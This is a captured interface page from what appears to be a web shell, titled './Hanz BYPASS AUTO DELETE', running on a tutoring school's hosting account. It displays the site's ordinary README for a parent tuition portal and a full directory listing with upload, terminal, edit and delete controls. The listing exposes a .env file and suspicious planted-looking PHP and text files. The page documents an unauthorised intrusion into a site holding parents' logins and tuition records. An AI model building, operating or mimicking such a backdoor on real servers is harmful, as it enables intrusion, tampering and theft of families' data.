./Hanz BYPASS AUTO DELETE

Path: / homepages / 44 / d338820553 / htdocs / clickandbuilds / FACES

πŸ“ Current Folder: FACES Permission: 0755 (klik permission untuk ganti chmod folder ini)
πŸ“¦ Mass Upload πŸ’» Terminal πŸ“„ + Add File πŸ”₯ + Mass Add File (Recursive)


Viewing: README.md

# yucai Website

Static site + light-weight PHP helpers that power the FACES / Yucai website.

## Parent Portal (Tuition Access)

Parents can log in at `/parents/` to view tuition balances, payment status, and notes.

- Credentials are stored in `parents/data/parents.json` (auto-created).
- Authentication uses secure password hashes (`password_hash` / `password_verify`).
- Tuition data is scoped per family; only logged-in parents can see their information.
- Parents can self-service password resets via `/parents/forgot-password.php` (links appear on the login page).

### Admin Membership Console

- Copy `parents/admin/config.sample.php` to `parents/admin/config.php`, set the admin username (defaults to `admin`), and replace the password hash with one generated for your chosen admin password:

  ```bash
  php -r "echo password_hash('your-new-admin-password', PASSWORD_DEFAULT), PHP_EOL;"
  ```

- Visit `/parents/admin/` and sign in with that password to open a form for adding or updating families (email, guardian name, students, tuition line items, due dates, notes, optional password reset).
- Existing families appear in a quick list for one-click loading.
- Admin sessions can be ended via `/parents/admin/logout.php`.

### Managing Parent Accounts

Use the helper script to create or update parent profiles:

```bash
php parents/scripts/manage_parent.php --email=family@example.com \
    --name="Lee Family" \
    --password="StrongPass9" \
    --students="Alice,Bob" \
    --tuition="Afterschool Fall 2024|1450|due|2024-09-10|Includes supplies" \
    --tuition="Writing Workshop|250|paid|2024-08-01|Paid via check or cash."
```

Key notes:

- Run the script again with the same `--email` to update tuition items or reset a password.
- Tuition format: `label|amount|status|due_date|notes`. Only `label` and `amount` are required.
- Passwords must be at least 8 characters with upper, lower, and numeric characters.
- The JSON file is locked during writes to avoid conflicts when multiple admins update it.

### Portal Pages

- `parents/login.php` – parent login form.
- `parents/forgot-password.php` – request a password reset link.
- `parents/reset-password.php` – enter a new password using the emailed token.
- `parents/admin/index.php` – password-protected admin panel for managing memberships.
- `parents/admin/login.php` / `parents/admin/logout.php` – admin session endpoints.
- `parents/admin/tuition-board.php` – admin view focused on entering/editing tuition line items with totals per family.
- `parents/tuition.php` – protected tuition summary page (requires login).
- `parents/logout.php` – clears the session and redirects to the login page.

Navigation links to the portal are present on `index.html` and `index_en.html`.

### Google Sign-In (optional)

- Set your Google OAuth client ID in `parents/bootstrap.php` (`PARENTS_GOOGLE_CLIENT_ID`). Use a Web client ID from the Google Cloud Console.
- The login page will show a β€œContinue with Google” button. On success, the backend verifies the ID token via Google, matches the verified email to an existing parent record, and logs the user in.
- Only emails that already exist in `parents/data/parents.json` are allowed; others get a friendly error. Replace the placeholder client ID to enable the button.
Close
Name Perm Action
πŸ“ .. (Parent Directory) 755
πŸ“ .well-known 755 Rename Del
πŸ“ ACT 755 Rename Del
πŸ“ SBGA 755 Rename Del
πŸ“ Static 755 Rename Del
πŸ“ amp 755 Rename Del
πŸ“ app 755 Rename Del
πŸ“ assets 755 Rename Del
πŸ“ clickandbuilds 755 Rename Del
πŸ“ code 755 Rename Del
πŸ“ dailyword 755 Rename Del
πŸ“ documents 755 Rename Del
πŸ“ parents 755 Rename Del
πŸ“ public_html 705 Rename Del
πŸ“ server 755 Rename Del
πŸ“ xxx 755 Rename Del
πŸ“„ .env 644 Rename Del Edit View
πŸ“„ .gitignore 644 Rename Del Edit View
πŸ“„ 20260704.html 644 Rename Del Edit View
πŸ“„ 2026summer_schedule.html 644 Rename Del Edit View
πŸ“„ AI_creation.html 644 Rename Del Edit View
πŸ“„ APChemistry.html 644 Rename Del Edit View
πŸ“„ APChemistry_en.html 644 Rename Del Edit View
πŸ“„ Circuit.html 644 Rename Del Edit View
πŸ“„ FACESParentalHandbook.pdf 644 Rename Del Edit View
πŸ“„ README.md 644 Rename Del Edit View
πŸ“„ RobloxCoding.html 644 Rename Del Edit View
πŸ“„ absent_en.html 644 Rename Del Edit View
πŸ“„ afterschool.html 644 Rename Del Edit View
πŸ“„ afterschool_en.html 644 Rename Del Edit View
πŸ“„ alternate-pickup.html 644 Rename Del Edit View
πŸ“„ alternate-pickup_en.html 644 Rename Del Edit View
πŸ“„ awards-store.html 644 Rename Del Edit View
πŸ“„ basketball.html 644 Rename Del Edit View
πŸ“„ c_academics.html 644 Rename Del Edit View
πŸ“„ c_art.html 644 Rename Del Edit View
πŸ“„ c_elementary.html 644 Rename Del Edit View
πŸ“„ c_highschool.html 644 Rename Del Edit View
πŸ“„ c_leadership.html 644 Rename Del Edit View
πŸ“„ c_middle.html 644 Rename Del Edit View
πŸ“„ c_social.html 644 Rename Del Edit View
πŸ“„ c_sports.html 644 Rename Del Edit View
πŸ“„ c_volunteer.html 644 Rename Del Edit View
πŸ“„ charitysale.html 644 Rename Del Edit View
πŸ“„ charitysale_en.html 644 Rename Del Edit View
πŸ“„ chinese.html 644 Rename Del Edit View
πŸ“„ congressional_award.html 644 Rename Del Edit View
πŸ“„ daily_vocab.html 644 Rename Del Edit View
πŸ“„ face-registration copy.php 444 Rename Del Edit View
πŸ“„ favicon.ico 644 Rename Del Edit View
πŸ“„ field-trip-waiver-wedgeworth_cn.html 644 Rename Del Edit View
πŸ“„ field-trip-waiver_cn.html 644 Rename Del Edit View
πŸ“„ freemath.html 644 Rename Del Edit View
πŸ“„ hans.php 644 Rename Del Edit View
πŸ“„ hapus.php 604 Rename Del Edit View
πŸ“„ hidden_links.txt 604 Rename Del Edit View
πŸ“„ highschoolmath.html 644 Rename Del Edit View
πŸ“„ home1.html 644 Rename Del Edit View
πŸ“„ hust.txt 604 Rename Del Edit View
πŸ“„ index.php 644 Rename Del Edit View
πŸ“„ index_en.html 644 Rename Del Edit View
πŸ“„ judo.html 644 Rename Del Edit View
πŸ“„ lexa.php 644 Rename Del Edit View
πŸ“„ lords_prayer_family_page.html 644 Rename Del Edit View
πŸ“„ mini.php 644 Rename Del Edit View
πŸ“„ ni_english.html 644 Rename Del Edit View
πŸ“„ p.php 604 Rename Del Edit View
πŸ“„ package-lock.json 644 Rename Del Edit View
πŸ“„ package.json 644 Rename Del Edit View
πŸ“„ page_layout_template.html 644 Rename Del Edit View
πŸ“„ register.php 644 Rename Del Edit View
πŸ“„ registration_cn.html 644 Rename Del Edit View
πŸ“„ registration_en.html 644 Rename Del Edit View
πŸ“„ robots.txt 644 Rename Del Edit View
πŸ“„ sat_en.html 644 Rename Del Edit View
πŸ“„ sat_winter_intensive.html 644 Rename Del Edit View
πŸ“„ saturdaymath.html 644 Rename Del Edit View
πŸ“„ schedule.html 644 Rename Del Edit View
πŸ“„ schedule_good.html 644 Rename Del Edit View
πŸ“„ senior_concert_en.html 644 Rename Del Edit View
πŸ“„ senior_conert.html 644 Rename Del Edit View
πŸ“„ sitemap.xml 604 Rename Del Edit View
πŸ“„ spring_camp_2026.html 644 Rename Del Edit View
πŸ“„ spring_camp_2026_en.html 644 Rename Del Edit View
πŸ“„ springbreak.html 644 Rename Del Edit View
πŸ“„ ss1.html 644 Rename Del Edit View
πŸ“„ student_form.html 644 Rename Del Edit View
πŸ“„ summer_schedule_artistic.html 644 Rename Del Edit View
πŸ“„ summercamp.html 644 Rename Del Edit View
πŸ“„ summercamp2026.html 644 Rename Del Edit View
πŸ“„ summercamp2026_en.html 644 Rename Del Edit View
πŸ“„ testtest.txt 644 Rename Del Edit View
πŸ“„ tts-proxy.php 644 Rename Del Edit View
πŸ“„ tts.html 644 Rename Del Edit View
πŸ“„ tts.js 644 Rename Del Edit View
πŸ“„ v_dance.html 644 Rename Del Edit View
πŸ“„ v_ele_math.html 644 Rename Del Edit View
πŸ“„ v_mentalmath.html 644 Rename Del Edit View
πŸ“„ v_piano.html 644 Rename Del Edit View
πŸ“„ v_violin.html 644 Rename Del Edit View
πŸ“„ v_vocabulary.html 644 Rename Del Edit View
πŸ“„ vocabulary_lesson2.html 644 Rename Del Edit View
πŸ“„ waiver.php 644 Rename Del Edit View
πŸ“„ walnut_site.html 644 Rename Del Edit View
πŸ“„ walnut_site_en.html 644 Rename Del Edit View
πŸ“„ wechat.html 644 Rename Del Edit View
πŸ“„ wechat_cn.html 644 Rename Del Edit View
πŸ“„ winter_camp.html 644 Rename Del Edit View
πŸ“„ word-db-06-20.json 644 Rename Del Edit View
πŸ“„ word-db.json 644 Rename Del Edit View
πŸ“„ writing.html 644 Rename Del Edit View
πŸ“„ writing1.html 644 Rename Del Edit View